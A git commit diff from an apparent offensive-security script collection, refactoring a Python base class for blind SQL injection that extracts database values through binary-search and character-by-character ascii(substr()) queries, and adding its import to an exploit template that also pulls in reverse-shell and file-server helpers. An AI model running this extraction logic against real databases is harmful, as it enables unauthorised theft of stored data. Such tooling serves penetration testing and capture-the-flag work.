sqli template

2024-02-24 16:08:04 +01:00 · 2024-02-24 16:08:04 +01:00 · 4b02f0bf25
commit 4b02f0bf25
parent 5a2508e524
2 changed files with 12 additions and 10 deletions
--- a/sqli.py
+++ b/sqli.py
@ -22,7 +22,7 @@ class SQLi(ABC):

        if not binary_search:
            cur_int = 1
-            while self.blind_sqli(f"({query})>{cur_int}"):
+            while self.blind_sqli(f"({query})>{cur_int}", verbose):
                cur_int += 1

            return cur_int
@ -30,16 +30,15 @@ class SQLi(ABC):
            min_value = 1
            max_value = 1

-            while self.blind_sqli(f"({query})>{max_value}"):
+            while self.blind_sqli(f"({query})>{max_value}", verbose):
                min_value = max_value + 1
                max_value = max_value * 2

-            max_value = max_value - 1
            while True:
                cur_int = (min_value + max_value) // 2
-                if self.blind_sqli(f"({query})>{cur_int}"):
+                if self.blind_sqli(f"({query})>{cur_int}", verbose):
                    min_value = cur_int + 1
-                elif self.blind_sqli(f"({query})<{cur_int}"):
+                elif self.blind_sqli(f"({query})<{cur_int}", verbose):
                    max_value = cur_int - 1
                else:
                    return cur_int
@ -67,7 +66,7 @@ class SQLi(ABC):
            found = False
            query = self.build_query(f"ascii(substr({column},{len(cur_str) + 1},1))", table, condition, offset)
            for c in charset:
-                if self.blind_sqli(f"({query})={ord(c)}"):
+                if self.blind_sqli(f"({query})={ord(c)}", verbose):
                    found = True
                    cur_str += c
                    if verbose:
@ -93,6 +92,12 @@ class SQLi(ABC):

        return rows

+    # Following methods need to be implemented in the exploit
+    @abstractmethod
+    def blind_sqli(self, condition: str, verbose=False) -> bool:
+        pass
+
+    # Following methods will be implemented by MySQLi, PostgreSQLi, ...
    @abstractmethod
    def get_database_version(self, verbose=False):
        pass
@ -105,10 +110,6 @@ class SQLi(ABC):
    def get_current_database(self, verbose=False):
        pass

-    @abstractmethod
-    def blind_sqli(self, condition: str, verbose=False) -> bool:
-        pass
-
    @abstractmethod
    def get_table_names(self, schema: str, verbose=False):
        pass
--- a/template.py
+++ b/template.py
@ -102,6 +102,7 @@ import urllib.parse
 from bs4 import BeautifulSoup
 from hackingscripts import util, rev_shell
 from hackingscripts.fileserver import HttpFileServer
+from hackingscripts.sqli import MySQLi, PostgreSQLi
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)